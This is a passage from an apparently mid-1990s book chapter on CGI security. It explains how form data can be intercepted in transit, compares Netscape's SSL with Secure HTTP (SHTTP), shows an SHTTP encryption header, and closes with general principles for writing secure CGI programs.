requires a secure means of getting the information from the browser to the
server and CGI program.
For example, suppose that I want
to sell books over the Internet. I might set up a Web server with a form
that allows customers to buy books by submitting personal information and a
credit card number. After I have that information, I want to store it on my
machine for company records.
If anyone were to break into my
company's machine, that person would have access to these confidential
records containing customer information and credit card numbers. In order to
prevent this, I would make sure the machine is configured securely and that
my CGI script that accepts form input is written correctly so that it cannot
be maliciously manipulated. In other words, as the administrator of the
machine and the CGI programmer, I have a lot of control over the first
problem: preventing information from being stolen directly from my machine.
However, how can I prevent someone
from intercepting the information as it goes from the client to the server?
Remember how information moves from the Web browser to the CGI program
"Common Gateway Interface (CGI)")? Information flows over the network from
the browser to the server first, and then the server passes the information
to the CGI program. This information can be intercepted while it is moved
from the client machine to the server . Note that in order to protect the
information from being intercepted over the network, the information must be
encrypted between the client and the server.
You cannot implement a
CGI-specific encryption scheme unless the client understands it, as well.
Java, CGI, and Secure
Transactions
Due to the nature of Web
transactions, the only way you could develop and use your own secure
transaction protocol using only CGI would be by first encrypting the form
information before it is submitted by the browser to the server.
Until recently, developing your
own secure transaction protocol was an impossible task. Thanks to recent
innovations in client-side processing such as Java, such development is now
possible.
The idea is to create a Java
interface that is a superset of normal HTML forms. When the Java Submit
button is selected, the Java applet first encrypts the appropriate values
before sending it to the Web server by using the normal POST HTTP request .
Using Java as a client to send and
receive encrypted data enables you to create your own customized encryption
schemes without requiring a potentially expensive commercial server. For
more information on how one might implement such a transaction.
Consequently, securing information
over the network requires modifying the way the browser and the server
communicate, something that cannot be controlled by using CGI. There are
currently two major proposals for encrypted client/server transactions:
Secure Sockets Layer (SSL), proposed by Netscape, and Secure HTTP (SHTTP),
proposed by Enterprise Integrations Technology (EIT). At this point, it is
not clear whether one scheme will become standard; several companies have
adopted both protocols in their servers. Consequently, it is useful to know
how to write CGI programs for both schemes.
SSL
SSL is a protocol-independent
encryption scheme that provides channel security between the application
layer and transport layer of a network packet . In plain English, this means
that encrypted transactions are handled "behind-the-scenes" by the server
and are essentially transparent to the HTML or CGI author.
Because the client and server's
network routines handle the encryption, almost all of your CGI scripts
should work without modification with secure transactions. There is one
notable exception. An nph (no-parse-header) CGI program bypasses the
server and communicates directly with the client. Consequently, nph CGI
scripts would break under secure transactions because the information never
gets encrypted. A notable CGI application that is affected by this problem
is Netscape server-push animations (discussed in detail in
Chapter 14, "Proprietary Extensions"). I doubt this is a major concern,
however, because it is highly likely that an animation is expendable on a
page for securely transmitting sensitive information.
SHTTP
SHTTP takes a different approach
from SSL. It works by extending the HTTP protocol (the application layer)
rather than a lower layer. Consequently, whereas SSL can be used for all
network services, SHTTP is a Web-specific protocol.
However, this has other benefits.
As a superset of HTTP, SHTTP is backward and forward compatible with HTTP
and SHTTP browsers and servers. In order to use SSL, you must have an SSL-enabled
browser and server. Additionally, SHTTP is a much more flexible protocol.
The server can designate preferred encryption schemes, for example.
SHTTP transactions depend on
additional HTTP headers. Consequently, if you want your CGI program to take
advantage of an SHTTP encrypted transaction, you need to include the
appropriate headers. For example, instead of simply returning the HTTP
header
Content-Type: text/html
you could return
Content-Type: text/html
Privacy-Enhancements: encrypt
When an SHTTP server receives this
information from the CGI application, it will know to encrypt the
information before sending it to the browser. A non-SHTTP browser will just
ignore the extra header.
For more information on using
SHTTP, refer to the SHTTP specifications located at <URL:http://www.commerce.net/information/standards/drafts/shttp.txt>
Summary
Security is an all-encompassing
thing when you are dealing with networked applications such as the World
Wide Web. Writing secure CGI applications is not tremendously useful if your
Web server is not securely configured. A properly configured Web server, on
the other hand, can minimize the damage of a badly written CGI script.
In general, remember the following
principles:
·
Your programs should do only what you want them to
do, no more.
·
Don't reveal any more information about your
server than necessary.
·
Minimize the potential damage if someone
successfully breaks into your machine.
·
Make sure your applications are robust.
When you are writing CGI programs,
be especially wary of the limitations (or lack thereof) of your programming
language and for passing unsanitized variables to the shell.
|